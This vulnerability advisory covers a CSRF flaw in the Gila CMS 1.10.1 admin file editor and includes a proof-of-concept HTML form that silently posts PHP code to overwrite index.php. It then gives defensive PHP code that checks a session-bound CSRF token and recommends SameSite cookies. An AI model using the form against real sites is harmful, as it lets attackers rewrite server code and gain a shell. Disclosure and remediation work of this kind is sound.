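Gila CMS 1.10.1 CSRF Vulnerability

1. Vulnerability Summary

Vulnerability name: Gila CMS 1.10.1 CSRF vulnerability
Report date: 2019-04-22
Discovered by: topsec_lizhongcheng
Product homepage: https://gilacms.com
Version: V1.10.1

2. Vulnerability Overview

The file-editing function in the admin backend performs no token validation, which results in a CSRF vulnerability. A correspondingly constructed exploit can lead to getshell.
File: /src/core/controllers/fm.php

Construct the following code, save it as an HTML file, and open it; the vulnerability will be triggered successfully.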
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.3.21/gila-1.10.1/fm/save" method="POST">
      <input type="hidden" name="contents" value="&lt;&#63;php&#10;&#47;&#42;&#33;&#10;&#32;&#42;&#32;Gila&#32;CMS&#10;&#32;&#42;&#32;Copyright&#32;2017&#45;19&#32;Vasileios&#32;Zoumpourlis&#10;&#32;&#42;&#32;Licensed&#32;under&#32;BSD&#32;3&#45;Clause&#32;License&#10;&#32;&#42;&#47;&#10;phpinfo&#40;&#41;&#59;&#10;exit&#40;&#41;&#59;&#10;include&#32;&apos;src&#47;core&#47;bootstrap&#46;php&apos;&#59;&#10;" />
      <input type="hidden" name="path" value="index&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
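
The missing check described above, shown as an added defensive example that is not Gila CMS code: a session-bound token that a state-changing action such as fm/save would verify before writing anything. The function names, the `csrf_token` field name and the `handle_save` wrapper are hypothetical, and the sample requests are constructed.

```php
<?php
// Added example, not Gila CMS source. All names here are hypothetical.

// Issue one random token per session; embed it as a hidden field in every admin form.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_token_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Hypothetical stand-in for a file-save action: refuse before touching disk.
function handle_save(array $session, array $post, string $method): array
{
    if ($method !== 'POST') {
        return [405, 'method not allowed'];
    }
    if (!csrf_token_is_valid($session, $post)) {
        return [403, 'invalid or missing CSRF token'];
    }
    // Existing authorization, path validation and the file write would follow here.
    return [200, 'saved'];
}

// Constructed sample requests, run offline with plain arrays instead of $_SESSION/$_POST.
$session = [];
$token = csrf_issue_token($session);

// Cross-site form like the one above: carries contents and path but cannot know the token.
$forged = ['contents' => '<?php /* constructed */', 'path' => 'index.php'];
// Same-origin admin form: includes the hidden token field.
$legit = ['contents' => '<?php /* admin edit */', 'path' => 'index.php', 'csrf_token' => $token];

foreach (['forged' => $forged, 'legit' => $legit] as $name => $post) {
    [$status, $msg] = handle_save($session, $post, 'POST');
    echo "$name: $status $msg\n";
}
```

A `SameSite=Lax` or `SameSite=Strict` attribute on the session cookie is a complementary control, because the cross-site form only works when the browser attaches the administrator's session cookie to the POST.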



